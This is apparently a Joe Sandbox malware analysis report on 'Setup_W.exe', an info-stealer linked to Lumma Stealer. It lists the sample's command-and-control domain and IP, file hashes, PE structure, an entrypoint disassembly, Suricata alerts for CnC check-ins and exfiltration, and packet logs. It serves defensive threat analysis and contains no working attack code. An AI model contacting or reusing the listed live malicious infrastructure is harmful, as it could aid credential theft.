https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mooncobudy.click/apiO	BitLockerToGo.exe, 00000004.00000003.2145451743.0000000003286000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mooncobudy.click/s):	BitLockerToGo.exe, 00000004.00000003.2169738032.0000000003286000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.44.57	mooncobudy.click	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580153
Start date and time:	2024-12-24 02:55:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Setup_W.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 85% Number of executed functions: 9 Number of non-executed functions: 75
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target BitLockerToGo.exe, PID 7680 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
20:56:35	API Interceptor	8x Sleep call for process: BitLockerToGo.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.44.57	https://lnkd.in/egd84c_Y	Get hash	malicious	Unknown	Browse
	https://lnkd.in/exwPeXjc	Get hash	malicious	HTMLPhisher	Browse
	https://lnkd.in/e4hHCn_z	Get hash	malicious	HTMLPhisher	Browse
	https://lnkd.in/e7UhDEpW	Get hash	malicious	HTMLPhisher	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	iviewers.dll	Get hash	malicious	LummaC	Browse	172.67.195.241
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.145.201
	Collapse.exe	Get hash	malicious	LummaC	Browse	172.67.199.72
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	AxoPac.exe	Get hash	malicious	LummaC	Browse	172.67.184.241
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.169.205
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.6
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.6
	'Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.169.205
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.191.144

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	iviewers.dll	Get hash	malicious	LummaC	Browse	104.21.44.57
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.44.57
	Collapse.exe	Get hash	malicious	LummaC	Browse	104.21.44.57
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.44.57
	AxoPac.exe	Get hash	malicious	LummaC	Browse	104.21.44.57
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.44.57
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.44.57
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.44.57
	'Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.44.57
	setup.exe	Get hash	malicious	LummaC	Browse	104.21.44.57

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\glfw.4281411633.dll	OD5lecPHBl.exe	Get hash	malicious	LummaC	Browse
C:\Users\user\AppData\Local\Temp\glfw.4281411633.dll	gFCeeWNTvZ.exe	Get hash	malicious	LummaC, MicroClip	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\glfw.4281411633.dll

Download File

Process:	C:\Users\user\Desktop\Setup_W.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1133967
Entropy (8bit):	6.2621593785107486
Encrypted:	false
SSDEEP:	12288:+a8Fde9YR/HHeL8ty/dqBHmShQqNHxhy4pDKP7BXUB:+NFbd9thHBQqNRhy4pDKtM
MD5:	4EC2D5A48D44C814F6AD68011E83A32B
SHA1:	881A6E610EF0B1DDD7BAE3C00A123C895E3DA570
SHA-256:	93CE68219CB0E920A0B9F04A38BBEFF104F530A643FD0A792215572525869F90
SHA-512:	FCA67E744FA535AE92C17AEF16DA3CA2FA58811DE0BACB97BA73E716DBDC62CAA1EE43D957E90C9FC93E6BC366EDACCD6D3FF60AE1182F1384BB0B4AE5DCCB07
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: OD5lecPHBl.exe, Detection: malicious, Browse Filename: gFCeeWNTvZ.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........*..b......!...".....L...$...........0....`d................................=......... ......................`.......p..x...........................................................t&...................... s...............................text...$...........................`.P`.data........0......................@.`..rdata.......@.......$..............@.`@.bss.... "...0........................`..edata.......`......................@.0@.idata..x....p......."..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B/4...................R..............@.@B/19.....c............X..............@..B/31......p.......r...n..............@..B/45..... ...........................@..B/57......>.......@..................@.0B/70......Z.......\..................@..B/81.......... .......t..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	1.6920799782292244
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Setup_W.exe
File size:	32'077'826 bytes
MD5:	bcb408aad4a09a615ecaab20c8016c3b
SHA1:	5b6885e46d0ee42bc1ff8f3c503c95d72e7b2882
SHA256:	d53658877443a27b1e4e5abfdf79717493343f21b824db045d5bfff67302465c
SHA512:	15d60431e3af171aeafe66ea55bcee6e5fddb5a5bb62fd1a6c01166f867796aa72931ed2662086d72ab37a710f17c473c3613e753df63fef3ed585c6b5f9697e
SSDEEP:	49152:lDw8IpmwyvpK9RGfEfMS+jNVlgy9K0PSSNDAmcSenM2VdRJmFzX5hDjEfx8kw6xE:ls8IpZP9RGfEk3NYSE6XizRcJoXK
TLSH:	83674B90F9CB14F6DA031830146B627F27356D058B25CBCBFA1CBF69EB776A10936609
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........`Y..............p%..J.......H.......pL...@...........................\......\|Y...@................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Static PE Info

General

Entrypoint:	0x464880
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	9cbefe68f395e67356e2a5d8d1b285c0

Entrypoint Preview

Instruction
jmp 00007F30D102B380h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
sub esp, 28h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+10h], ebp
mov dword ptr [esp+14h], esi
mov dword ptr [esp+18h], edi
mov esi, eax
mov edx, dword ptr fs:[00000014h]
cmp edx, 00000000h
jne 00007F30D102D6A9h
mov eax, 00000000h
jmp 00007F30D102D706h
mov edx, dword ptr [edx+00000000h]
cmp edx, 00000000h
jne 00007F30D102D6A7h
call 00007F30D102D799h
mov dword ptr [esp+20h], edx
mov dword ptr [esp+24h], esp
mov ebx, dword ptr [edx+18h]
mov ebx, dword ptr [ebx]
cmp edx, ebx
je 00007F30D102D6BAh
mov ebp, dword ptr fs:[00000014h]
mov dword ptr [ebp+00000000h], ebx
mov edi, dword ptr [ebx+1Ch]
sub edi, 28h
mov dword ptr [edi+24h], esp
mov esp, edi
mov ebx, dword ptr [ecx]
mov ecx, dword ptr [ecx+04h]
mov dword ptr [esp], ebx
mov dword ptr [esp+04h], ecx
mov dword ptr [esp+08h], edx
call esi
mov eax, dword ptr [esp+0Ch]
mov esp, dword ptr [esp+24h]
mov edx, dword ptr [esp+20h]
mov ebp, dword ptr fs:[00000014h]
mov dword ptr [ebp+00000000h], edx
mov edi, dword ptr [esp+18h]
mov esi, dword ptr [esp+14h]
mov ebp, dword ptr [esp+10h]
mov ebx, dword ptr [esp+1Ch]
add esp, 28h
retn 0004h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
mov edx, dword ptr [ecx]
mov eax, esp

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5aa000	0x3dc	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5ca000	0x1569	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5ab000	0x1d196	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4c7ac0	0xa0	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x256f45	0x257000	d278899f2c6422f4d7a6b52a5e0580ac	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x258000	0x26e178	0x26e200	bead5027654621eeb6cf85bfce10536f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4c7000	0xe2e88	0xb3400	3a8397f699b886c54af33952f9d8f93a	False	0.823827852597629	data	7.541368107103972	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5aa000	0x3dc	0x400	fb5b1331cefd67685dc75e5d1313908b	False	0.4892578125	data	4.658569854292025	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x5ab000	0x1d196	0x1d200	f59ddc37c309ed2fd920e7c1d497e73a	False	0.592903366416309	data	6.654996174362885	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab	0x5c9000	0x4	0x200	07b5472d347d42780469fb2654b7fc54	False	0.02734375	data	0.020393135236084953	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x5ca000	0x1569	0x1600	ba22aa132f6a48ea7531938e212a0bfe	False	0.33238636363636365	data	4.333247400480422	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x5ca18c	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.5675675675675675
RT_ICON	0x5ca2b4	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States	0.4486994219653179
RT_ICON	0x5ca81c	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.4637096774193548
RT_ICON	0x5cab04	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.3935018050541516
RT_GROUP_ICON	0x5cb3ac	0x3e	data	English	United States	0.8387096774193549
RT_MANIFEST	0x5cb3ec	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

kernel32.dll

WriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-24T02:56:35.575963+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	104.21.44.57	443	TCP
2024-12-24T02:56:36.609310+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49736	104.21.44.57	443	TCP
2024-12-24T02:56:36.609310+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49736	104.21.44.57	443	TCP
2024-12-24T02:56:37.836660+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	104.21.44.57	443	TCP
2024-12-24T02:56:38.875868+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49737	104.21.44.57	443	TCP
2024-12-24T02:56:38.875868+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49737	104.21.44.57	443	TCP
2024-12-24T02:56:40.466376+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	104.21.44.57	443	TCP
2024-12-24T02:56:43.149298+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	104.21.44.57	443	TCP
2024-12-24T02:56:44.090669+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49739	104.21.44.57	443	TCP
2024-12-24T02:56:45.506207+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49740	104.21.44.57	443	TCP
2024-12-24T02:56:48.609961+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	104.21.44.57	443	TCP
2024-12-24T02:56:51.052897+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	104.21.44.57	443	TCP
2024-12-24T02:56:51.065678+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.4	49742	104.21.44.57	443	TCP
2024-12-24T02:57:01.995879+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49749	104.21.44.57	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 02:56:34.354233980 CET	49736	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:34.354273081 CET	443	49736	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:34.354345083 CET	49736	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:34.358361006 CET	49736	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:34.358378887 CET	443	49736	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:35.575881958 CET	443	49736	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:35.575963020 CET	49736	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:35.797346115 CET	49736	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:35.797383070 CET	443	49736	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:35.797755957 CET	443	49736	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:35.839376926 CET	49736	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:35.853719950 CET	49736	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:35.853751898 CET	49736	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:35.853813887 CET	443	49736	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:36.609298944 CET	443	49736	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:36.609378099 CET	443	49736	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:36.609432936 CET	49736	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:36.612060070 CET	49736	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:36.612078905 CET	443	49736	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:36.621550083 CET	49737	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:36.621576071 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:36.621648073 CET	49737	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:36.621957064 CET	49737	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:36.621968031 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:37.836580992 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:37.836659908 CET	49737	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:37.837939024 CET	49737	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:37.837948084 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:37.838181019 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:37.842956066 CET	49737	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:37.843002081 CET	49737	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:37.843034029 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:38.875871897 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:38.875910997 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:38.876029015 CET	49737	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:38.876041889 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:38.877089977 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:38.877118111 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:38.877137899 CET	49737	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:38.877145052 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:38.877192974 CET	49737	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:38.884169102 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:38.895956993 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:38.895987034 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:38.896001101 CET	49737	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:38.896009922 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:38.896055937 CET	49737	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:38.904350042 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:38.948770046 CET	49737	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:38.995635033 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:39.042504072 CET	49737	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:39.042511940 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:39.071626902 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:39.071652889 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:39.071686983 CET	49737	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:39.071691990 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:39.071732044 CET	49737	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:39.071737051 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:39.072012901 CET	49737	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:39.072153091 CET	49737	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:39.072166920 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:39.072176933 CET	49737	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:39.072182894 CET	443	49737	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:39.252322912 CET	49738	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:39.252371073 CET	443	49738	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:39.252461910 CET	49738	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:39.252820015 CET	49738	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:39.252845049 CET	443	49738	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:40.466288090 CET	443	49738	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:40.466376066 CET	49738	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:40.467801094 CET	49738	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:40.467812061 CET	443	49738	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:40.468051910 CET	443	49738	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:40.469192028 CET	49738	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:40.469340086 CET	49738	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:40.469373941 CET	443	49738	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:40.469434023 CET	49738	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:40.469441891 CET	443	49738	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:41.850955963 CET	443	49738	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:41.851057053 CET	443	49738	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:41.851111889 CET	49738	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:41.851299047 CET	49738	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:41.851315022 CET	443	49738	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:41.934942961 CET	49739	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:41.934973955 CET	443	49739	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:41.935030937 CET	49739	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:41.935379028 CET	49739	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:41.935390949 CET	443	49739	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:43.149226904 CET	443	49739	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:43.149297953 CET	49739	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:43.150490999 CET	49739	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:43.150500059 CET	443	49739	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:43.150698900 CET	443	49739	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:43.151786089 CET	49739	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:43.151935101 CET	49739	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:43.151962996 CET	443	49739	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:44.090620995 CET	443	49739	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:44.090706110 CET	443	49739	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:44.090755939 CET	49739	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:44.090946913 CET	49739	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:44.090964079 CET	443	49739	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:44.286206007 CET	49740	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:44.286252022 CET	443	49740	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:44.286320925 CET	49740	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:44.286658049 CET	49740	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:44.286672115 CET	443	49740	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:45.506128073 CET	443	49740	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:45.506206989 CET	49740	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:45.507493973 CET	49740	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:45.507500887 CET	443	49740	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:45.507719994 CET	443	49740	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:45.508941889 CET	49740	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:45.509069920 CET	49740	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:45.509099960 CET	443	49740	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:45.509165049 CET	49740	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:45.509171963 CET	443	49740	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:46.573399067 CET	443	49740	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:46.573476076 CET	443	49740	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:46.573574066 CET	49740	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:46.573859930 CET	49740	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:46.573874950 CET	443	49740	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:47.396867037 CET	49741	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:47.396910906 CET	443	49741	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:47.396985054 CET	49741	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:47.397399902 CET	49741	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:47.397416115 CET	443	49741	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:48.609816074 CET	443	49741	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:48.609961033 CET	49741	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:48.611350060 CET	49741	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:48.611356974 CET	443	49741	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:48.611587048 CET	443	49741	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:48.612926960 CET	49741	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:48.613035917 CET	49741	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:48.613044024 CET	443	49741	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:49.385776997 CET	443	49741	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:49.385871887 CET	443	49741	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:49.385920048 CET	49741	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:49.386075020 CET	49741	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:49.386086941 CET	443	49741	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:49.785052061 CET	49742	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:49.785101891 CET	443	49742	104.21.44.57	192.168.2.4
